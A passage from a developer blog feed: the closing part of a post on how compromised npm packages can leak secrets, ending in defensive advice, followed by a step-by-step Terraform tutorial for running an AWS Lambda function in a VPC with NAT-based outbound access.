the application function it will still hang (since the malicous code blocks) but from the logs we can see that the request to the <strong>whitelisted API succeeded</strong>:</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F04%2Fhow-compromised-npm-package-can-steal-your-secrets%2Foutbound-whitelisted-worked.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F04%2Fhow-compromised-npm-package-can-steal-your-secrets%2Foutbound-whitelisted-worked.webp" alt="outbound whitelisted worked"></a></p> <p>Full code for the <a href="https://github.com/maximivanov/nodejs-leak-env-vars/tree/master/leak-env-vars-poc-outbound-whitelisted" rel="noopener noreferrer">whitelisted destinations</a> app.</p> <h2> References </h2> <ul> <li><a href="https://techbeacon.com/security/check-your-dependencies-githubs-npm-finds-nasty-trojan-packages" rel="noopener noreferrer">https://techbeacon.com/security/check-your-dependencies-githubs-npm-finds-nasty-trojan-packages</a></li> <li><a href="https://snyk.io/blog/malicious-code-found-in-npm-package-event-stream/" rel="noopener noreferrer">https://snyk.io/blog/malicious-code-found-in-npm-package-event-stream/</a></li> <li><a href="https://owasp.org/www-community/attacks/Code_Injection" rel="noopener noreferrer">https://owasp.org/www-community/attacks/Code_Injection</a></li> <li><a href="https://api.chucknorris.io/" rel="noopener noreferrer">https://api.chucknorris.io/</a></li> <li><a href="https://www.maxivanov.io/deploy-aws-lambda-to-vpc-with-terraform/" rel="noopener noreferrer">https://www.maxivanov.io/deploy-aws-lambda-to-vpc-with-terraform/</a></li> <li><a href="https://github.com/maximivanov/nodejs-leak-env-vars" rel="noopener noreferrer">https://github.com/maximivanov/nodejs-leak-env-vars</a></li> </ul> <h2> ... </h2> <p>To summarize, keep your applications safe: </p> <ul> <li>apply <strong>least privilege principle</strong> when granting IAM permissions</li> <li>do not store secrets in <strong>plain text</strong> in environment variables</li> <li> <strong>block or whitelist</strong> inbound and outbound network access</li> <li>analyze npm dependencies for <strong>known vulnerabilities</strong> with <code>npm audit</code> and tools like <a href="https://support.snyk.io/hc/en-us/articles/360004712477-Snyk-for-JavaScript" rel="noopener noreferrer">snyk</a> before they find their way to your servers</li> </ul> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i" rel="noopener noreferrer">follow me</a> on Twitter for the latest updates.</em></p> aws npm node security Deploy AWS Lambda to VPC with Terraform Max Ivanov Sun, 11 Apr 2021 00:39:43 +0000 https://forem.com/maxivanov/deploy-aws-lambda-to-vpc-with-terraform-6i5 https://forem.com/maxivanov/deploy-aws-lambda-to-vpc-with-terraform-6i5 <p>You may need to put your Lambda function into a VPC (Virtual Private Cloud) for the function to have access to the resources in the private network. Common use case is accessing an RDS instance not reachable from the Internet.</p> <p>Running Lambda in a VPC has some downsides:</p> <ul> <li>Networking limitations at scale. There are soft and hard limits to the number of ENIs (virtual network cards) shared by compute instances that you can have.</li> <li>Much more complex setup compared to the standard "managed" Lambda configuration.</li> </ul> <p>Check this <a href="https://lumigo.io/aws-lambda-deployment/lambda-vpc/" rel="noopener noreferrer">article</a> by Yan Cui for more details. There used to be an issue of slower cold starts for Lambdas connected to VPCs, but it's <a href="https://mikhail.io/serverless/coldstarts/aws/#what-is-the-effect-of-vpc-access" rel="noopener noreferrer">not the case anymore</a>.</p> <p>Considering the large number of AWS resources one needs to create and configre to have Lambda in a private subnet, getting it right may be challenging, especially if you're not a network engineer. It surely took me some time to figure out. </p> <p>Many tutorials on the Internet describe the process using AWS Console to provision resources. It may be sufficient for quick experiments but for something more long-term you should probably invest some time in defining resources with infrastructure-as-code. <br> If Terraform is what you use, this post may be useful to you.</p> <p>We'll go from a basic, non-VPC Lambda Terraform module and will upgrade it to run the function in a VPC with oubound (Internet) connectivity, one step at a time.</p> <h2> Prerequisites </h2> <p>To follow along you will need:</p> <ul> <li>Terraform 0.14</li> <li>AWS Account and AWS CLI</li> </ul> <p>I'll be using Docker below to run both. If you don't have the tools installed locally, you're welcome to do the same.</p> <p>Note some AWS resources incur costs, most notably NAT Gateway will set you back ~$32/month.</p> <h2> Ground zero </h2> <p>Let's create a standard Lambda function with Terraform and make sure it works first. The function will run a little snippet of Node.js code. Since we want to test the connectivity to the internet, the function will fetch some data from a 3rd party API. For added credibility, we'll integrate with an API providing random Chuck Norris facts (so old but still so good!).</p> <blockquote> <p>When Chuck Norris enters a room, he doesn't turn the lights on, he turns the dark off.</p> </blockquote> <h3> Lambda code </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">https</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">https</span><span class="dl">'</span><span class="p">)</span> <span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async</span> <span class="nf">function </span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">res</span> <span class="o">=</span> <span class="k">await</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://api.chucknorris.io/jokes/random</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">randomFact</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">parse</span><span class="p">(</span><span class="nx">res</span><span class="p">).</span><span class="nx">value</span> <span class="k">return</span> <span class="nx">randomFact</span> <span class="p">}</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">fetch</span><span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="k">new</span> <span class="nc">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">request</span> <span class="o">=</span> <span class="nx">https</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nx">url</span><span class="p">,</span> <span class="p">{</span> <span class="na">timeout</span><span class="p">:</span> <span class="mi">1000</span> <span class="p">},</span> <span class="p">(</span><span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">statusCode</span> <span class="o">&lt;</span> <span class="mi">200</span> <span class="o">||</span> <span class="nx">res</span><span class="p">.</span><span class="nx">statusCode</span> <span class="o">&gt;</span> <span class="mi">299</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">reject</span><span class="p">(</span><span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="s2">`HTTP status code </span><span class="p">${</span><span class="nx">res</span><span class="p">.</span><span class="nx">statusCode</span><span class="p">}</span><span class="s2">`</span><span class="p">))</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">body</span> <span class="o">=</span> <span class="p">[]</span> <span class="nx">res</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">data</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">chunk</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nx">body</span><span class="p">.</span><span class="nf">push</span><span class="p">(</span><span class="nx">chunk</span><span class="p">))</span> <span class="nx">res</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">end</span><span class="dl">'</span><span class="p">,</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">resString</span> <span class="o">=</span> <span class="nx">Buffer</span><span class="p">.</span><span class="nf">concat</span><span class="p">(</span><span class="nx">body</span><span class="p">).</span><span class="nf">toString</span><span class="p">()</span> <span class="nf">resolve</span><span class="p">(</span><span class="nx">resString</span><span class="p">)</span> <span class="p">})</span> <span class="p">})</span> <span class="nx">request</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">error</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">reject</span><span class="p">(</span><span class="nx">err</span><span class="p">))</span> <span class="nx">request</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">timeout</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">timed out</span><span class="dl">'</span><span class="p">,</span> <span class="nx">err</span><span class="p">)</span> <span class="nf">reject</span><span class="p">(</span><span class="nx">err</span><span class="p">)</span> <span class="p">})</span> <span class="p">})</span> <span class="p">}</span> </code></pre> </div> <p>The code is straightforward - it fetches a random fact from the API and returns it to the caller.</p> <p>To make it simple, I didn't want to add any dependencies and used native <code>https</code> Node module for making requests.</p> <h3> Lambda Terraform module </h3> <p>We start with couple variables: <code>project</code> will be used as a prefix in resource names and region is where the resources will be deployed.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/variables.tf</span> <span class="nx">variable</span> <span class="s2">"project"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"Project name"</span> <span class="p">}</span> <span class="nx">variable</span> <span class="s2">"region"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"Azure region"</span> <span class="nx">default</span> <span class="p">=</span> <span class="s2">"us-east-1"</span> <span class="p">}</span> </code></pre> </div> <p>If you ever deployed Lambda with Terraform, there shouldn't be any surprises. The minimum set of resources includes an IAM role with managed <code>AWSLambdaBasicExecutionRole</code> policy attached, the function itself, and the archive with the code to be uploaded to Lambda. Every time you make a change in the code, the hash of the ZIP file will change and Lambda code will be updated by Terraform. In the real world, you'll probably want to configure a CI/CD pipeline to push code updates to Lambda.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="nx">provider</span> <span class="s2">"aws"</span> <span class="p">{</span> <span class="nx">profile</span> <span class="p">=</span> <span class="s2">"default"</span> <span class="nx">region</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">region</span> <span class="p">}</span> <span class="nx">provider</span> <span class="s2">"archive"</span> <span class="p">{}</span> <span class="nx">data</span> <span class="s2">"archive_file"</span> <span class="s2">"lambda"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="s2">"zip"</span> <span class="nx">source_dir</span> <span class="p">=</span> <span class="s2">"../lambda"</span> <span class="nx">output_path</span> <span class="p">=</span> <span class="s2">"lambda.zip"</span> <span class="p">}</span> <span class="nx">data</span> <span class="s2">"aws_iam_policy_document"</span> <span class="s2">"AWSLambdaTrustPolicy"</span> <span class="p">{</span> <span class="nx">version</span> <span class="p">=</span> <span class="s2">"2012-10-17"</span> <span class="nx">statement</span> <span class="p">{</span> <span class="nx">actions</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"sts:AssumeRole"</span><span class="p">]</span> <span class="nx">effect</span> <span class="p">=</span> <span class="s2">"Allow"</span> <span class="nx">principals</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="s2">"Service"</span> <span class="nx">identifiers</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"lambda.amazonaws.com"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role"</span> <span class="s2">"iam_role"</span> <span class="p">{</span> <span class="nx">assume_role_policy</span> <span class="p">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">aws_iam_policy_document</span><span class="p">.</span><span class="nx">AWSLambdaTrustPolicy</span><span class="p">.</span><span class="nx">json</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.project}-iam-role-lambda-trigger"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role_policy_attachment"</span> <span class="s2">"iam_role_policy_attachment_lambda_basic_execution"</span> <span class="p">{</span> <span class="nx">role</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="p">.</span><span class="nx">iam_role</span><span class="p">.</span><span class="nx">name</span> <span class="nx">policy_arn</span> <span class="p">=</span> <span class="s2">"arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_lambda_function"</span> <span class="s2">"lambda_function"</span> <span class="p">{</span> <span class="nx">code_signing_config_arn</span> <span class="p">=</span> <span class="s2">""</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">""</span> <span class="nx">filename</span> <span class="p">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">archive_file</span><span class="p">.</span><span class="nx">lambda</span><span class="p">.</span><span class="nx">output_path</span> <span class="nx">function_name</span> <span class="p">=</span> <span class="s2">"${var.project}-lambda-function"</span> <span class="nx">role</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="p">.</span><span class="nx">iam_role</span><span class="p">.</span><span class="nx">arn</span> <span class="nx">handler</span> <span class="p">=</span> <span class="s2">"index.handler"</span> <span class="nx">runtime</span> <span class="p">=</span> <span class="s2">"nodejs14.x"</span> <span class="nx">source_code_hash</span> <span class="p">=</span> <span class="nx">filebase64sha256</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">archive_file</span><span class="p">.</span><span class="nx">lambda</span><span class="p">.</span><span class="nx">output_path</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <h3> Deploy ground zero to AWS </h3> <p>Start a dev Docker container based on the AWS CLI image:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">--rm</span> <span class="nt">-it</span> <span class="nt">-v</span> <span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span>:/var/app <span class="nt">-w</span> /var/app <span class="nt">--entrypoint</span> bash amazon/aws-cli </code></pre> </div> <p>Configure AWS credentials (access key ID, secret access key) that will be used by Terraform below:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws configure </code></pre> </div> <p>Install Terraform:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>yum <span class="nb">install</span> <span class="nt">-y</span> yum-utils yum-config-manager <span class="nt">--add-repo</span> https://rpm.releases.hashicorp.com/AmazonLinux/hashicorp.repo yum <span class="nt">-y</span> <span class="nb">install </span>terraform </code></pre> </div> <p>Deploy the module:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cd </span>terraform terraform init terraform apply </code></pre> </div> <p>Make sure Lambda works:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws lambda invoke <span class="nt">--function-name</span> lambda-vpc-tf-lambda-function out.txt <span class="o">{</span> <span class="s2">"StatusCode"</span>: 200, <span class="s2">"ExecutedVersion"</span>: <span class="s2">"</span><span class="nv">$LATEST</span><span class="s2">"</span> <span class="o">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cat </span>out.txt <span class="s2">"If you spell Chuck Norris in Scrabble, you win. Forever."</span> </code></pre> </div> <h2> VPC resources </h2> <p>Be prepared, there will be many resources. Still Terraform helps a lot, if you were to check equivalent config in Cloudformation, it's more verbose!</p> <p>On a high level, we will create a new VPC with 2 subnets. One is <em>public</em> (has a route to the Internet) and the other is <em>private</em> (does not have direct route out). The way to connect Lambda to VPC is by associating it with at least one private subnet. That would give the function access to the resources in the VPC. But it won't have oubound connectivity yet. For that, a NAT component is required.</p> <h3> Create VPC </h3> <p>Every AWS account has a default VPC pre-created. You can use that, but let's see how to create one.</p> <p>The only required argument is the address space of the virtual network (in CIDR format).<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/variables.tf</span> <span class="err">...</span> <span class="nx">variable</span> <span class="s2">"vpc_cidr_block"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"VPC CIDR"</span> <span class="p">}</span> </code></pre> </div> <p>I'll go with <code>vpc_cidr_block = "10.0.0.0/16"</code> spanning 65,536 IP addresses.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_vpc"</span> <span class="s2">"vpc"</span> <span class="p">{</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">vpc_cidr_block</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-vpc"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p>Quick note on the <code>Name</code> tag. More often than not, there's no "name" property on the VPC Terraform resources themselves, but if you add a <code>Name</code> tag it serves the same purpose. The value will be used in the AWS Console in the Name column.</p> <p><a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F04%2Fdeploy-aws-lambda-to-vpc-with-terraform%2Fvpc-name-tag.webp" class="article-body-image-wrapper"><img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fwww.maxivanov.io%2Fposts%2F2021%2F04%2Fdeploy-aws-lambda-to-vpc-with-terraform%2Fvpc-name-tag.webp" alt="vpc name tag"></a></p> <h3> Create public subnet </h3> <p>Besides the subnet itself, we'll create a number of supporting resources too.</p> <p><strong>Public subnet</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/variables.tf</span> <span class="err">...</span> <span class="nx">variable</span> <span class="s2">"subnet_public_cidr_block"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"Public subnet CIDR"</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/terraform.tfvars</span> <span class="err">...</span> <span class="nx">subnet_public_cidr_block</span> <span class="err">=</span> <span class="s2">"10.0.0.0/21"</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_subnet"</span> <span class="s2">"subnet_public"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">id</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">subnet_public_cidr_block</span> <span class="nx">map_public_ip_on_launch</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-subnet-public"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p><strong>Internet Gateway</strong></p> <p>Each VPC can be associated with one (and only one) Internet Gateway. It is a managed highly available service from AWS which provides connectivity for public IP-enabled instances in the VPC to the Internet.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_internet_gateway"</span> <span class="s2">"internet_gateway"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">id</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-internet-gateway"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p><strong>Public route table</strong></p> <p>What makes a public subnet <strong>public</strong> is a route to the Internet Gateway. Let's do just that, create a new route table with a single route (rule) to direct network requests to the Internet Gateway. We then associate the (public) route table with the (public) subnet. There's an implicit route allowing traffic within the VPC.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_route_table"</span> <span class="s2">"route_table_public"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">id</span> <span class="nx">route</span> <span class="p">{</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="s2">"0.0.0.0/0"</span> <span class="nx">gateway_id</span> <span class="p">=</span> <span class="nx">aws_internet_gateway</span><span class="p">.</span><span class="nx">internet_gateway</span><span class="p">.</span><span class="nx">id</span> <span class="p">}</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-route-table-public"</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_route_table_association"</span> <span class="s2">"route_table_association_public"</span> <span class="p">{</span> <span class="nx">subnet_id</span> <span class="p">=</span> <span class="nx">aws_subnet</span><span class="p">.</span><span class="nx">subnet_public</span><span class="p">.</span><span class="nx">id</span> <span class="nx">route_table_id</span> <span class="p">=</span> <span class="nx">aws_route_table</span><span class="p">.</span><span class="nx">route_table_public</span><span class="p">.</span><span class="nx">id</span> <span class="p">}</span> </code></pre> </div> <p><strong>Elastic IP and NAT Gateway</strong></p> <p>NAT Gateway is a network device that enables outbound connectivity for devices in the private network. Gateway translates requests from a private subnet to the Internet (by replacing the private "from" IP of the sender with gateway's public IP and putting it back to deliver the response to the sender). The relationship here is one to many - one NAT device serves many clients in the private subnet. NAT device must have a public IP address (Elastic IP in our case) and must be placed in the public subnet where it can reach the Internet.</p> <p>Before AWS introduced NAT Gateway one could launch an EC2 instance with NAT configured. That's still a valid (and cheaper when compared to NAT Gateway) option, but you'd need to look after the instance (disk space, OS and security upgrades, etc.). NAT Gateway price varies depending on the region, cheapest being $0.045/hr as of the time of writing.</p> <p>For critical workflows, AWS recommends configuring at least 2 NAT gateways placed in different availability zones to avoid single point of failure in case of AZ going down. To keep it simple, we'll create only a single gateway.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_eip"</span> <span class="s2">"eip"</span> <span class="p">{</span> <span class="nx">vpc</span> <span class="p">=</span> <span class="kc">true</span> <span class="nx">depends_on</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_internet_gateway</span><span class="p">.</span><span class="nx">internet_gateway</span><span class="p">]</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-eip"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_nat_gateway"</span> <span class="s2">"nat_gateway"</span> <span class="p">{</span> <span class="nx">allocation_id</span> <span class="p">=</span> <span class="nx">aws_eip</span><span class="p">.</span><span class="nx">eip</span><span class="p">.</span><span class="nx">id</span> <span class="nx">subnet_id</span> <span class="p">=</span> <span class="nx">aws_subnet</span><span class="p">.</span><span class="nx">subnet_public</span><span class="p">.</span><span class="nx">id</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-nat-gateway"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <h3> Create private subnet </h3> <p>Private subnet is what we will associate Lambda with. The address space must be large enough to accomodate all IPs that will be assigned to ENIs when Lambda scales out.</p> <p><strong>Private subnet</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/variables.tf</span> <span class="err">...</span> <span class="nx">variable</span> <span class="s2">"subnet_private_cidr_block"</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="nx">string</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"Private subnet CIDR"</span> <span class="p">}</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/terraform.tfvars</span> <span class="err">...</span> <span class="nx">subnet_private_cidr_block</span> <span class="err">=</span> <span class="s2">"10.0.8.0/21"</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_subnet"</span> <span class="s2">"subnet_private"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">id</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">subnet_private_cidr_block</span> <span class="nx">map_public_ip_on_launch</span> <span class="p">=</span> <span class="kc">false</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-subnet-private"</span> <span class="p">}</span> <span class="p">}</span> </code></pre> </div> <p><strong>Private route table</strong></p> <p>Like in the public subnet, we need a route table with a route to direct traffic from the subnet to the NAT gateway. By default, devices in subnets within a VPC can talk to each other. In our case, it's Lambda in the private subnet making calls to the NAT Gateway in the public subnet.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_route_table"</span> <span class="s2">"route_table_private"</span> <span class="p">{</span> <span class="nx">vpc_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">id</span> <span class="nx">route</span> <span class="p">{</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="s2">"0.0.0.0/0"</span> <span class="nx">nat_gateway_id</span> <span class="p">=</span> <span class="nx">aws_nat_gateway</span><span class="p">.</span><span class="nx">nat_gateway</span><span class="p">.</span><span class="nx">id</span> <span class="p">}</span> <span class="nx">tags</span> <span class="p">=</span> <span class="p">{</span> <span class="nx">Name</span> <span class="p">=</span> <span class="s2">"${var.project}-route-table-private"</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_route_table_association"</span> <span class="s2">"route_table_association_private"</span> <span class="p">{</span> <span class="nx">subnet_id</span> <span class="p">=</span> <span class="nx">aws_subnet</span><span class="p">.</span><span class="nx">subnet_private</span><span class="p">.</span><span class="nx">id</span> <span class="nx">route_table_id</span> <span class="p">=</span> <span class="nx">aws_route_table</span><span class="p">.</span><span class="nx">route_table_private</span><span class="p">.</span><span class="nx">id</span> <span class="p">}</span> </code></pre> </div> <h3> Create security resources </h3> <p>In VPCs, the security controls available to you are Network Access Control Lists and Security Groups. These 2 are complementary and can be used individually as well as in combination.</p> <p>NACLs are stateless (for a given connection, you need to specify both inbound and outbound rules) and are associated with subnets.</p> <p>Security Groups are stateful (allowing inbound traffic to a port will automatically allow replies from that port). You associate devices (EC2 instances, Lambda) with security groups.</p> <p>Whenever a VPC is created, a NACL and a security group are created implicitly. You can take over these resources with <code>aws_default_...</code> Terraform resources. Ingress and egress rules provided below match what's created by AWS by default.</p> <p><strong>NACL</strong></p> <p>As with default settings, it allows all traffic on the network level.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="c1"># terraform/main.tf</span> <span class="err">...</span> <span class="nx">resource</span> <span class="s2">"aws_default_network_acl"</span> <span class="s2">"default_network_acl"</span> <span class="p">{</span> <span class="nx">default_network_acl_id</span> <span class="p">=</span> <span class="nx">aws_vpc</span><span class="p">.</span><span class="nx">vpc</span><span class="p">.</span><span class="nx">default_network_acl_id</span> <span class="nx">subnet_ids</span> <span class="p">=</span> <span class="p">[</span><span class="nx">aws_subnet</span><span class="p">.</span><span class="nx">subnet_public</span><span class="p">.</span><span class="nx">id</span><span class="p">,</span> <span class="nx">aws_subnet</span><span class="p">.</span><span class="nx">subnet_private</span><span class="p">.</span><span class="nx">id</span><span class="p">]</span> <span class="nx">ingress</span> <span class="p">{</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="nx">-1</span> <span class="nx">rule_no</span> <span class="p">=</span> <span class="mi">100</span> <span class="nx">action</span> <span class="p">=</span> <span class="s2">"allow"</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="s2">"0.0.0.0/0"</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="p">}</span> <span class="nx">egress</span> <span class="p">{</span> <span class="nx">protocol</span> <span class="p">=</span> <span class="nx">-1</span> <span class="nx">rule_no</span> <span class="p">=</span> <span class="mi">100</span> <span class="nx">action</span> <span class="p">=</span> <span class="s2">"allow"</span> <span class="nx">cidr_block</span> <span class="p">=</span> <span class="s2">"0.0.0.0/0"</span> <span class="nx">from_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="nx">to_port</span> <span class="p">=</span> <span class="mi">0</span> <span class="p">}</span> 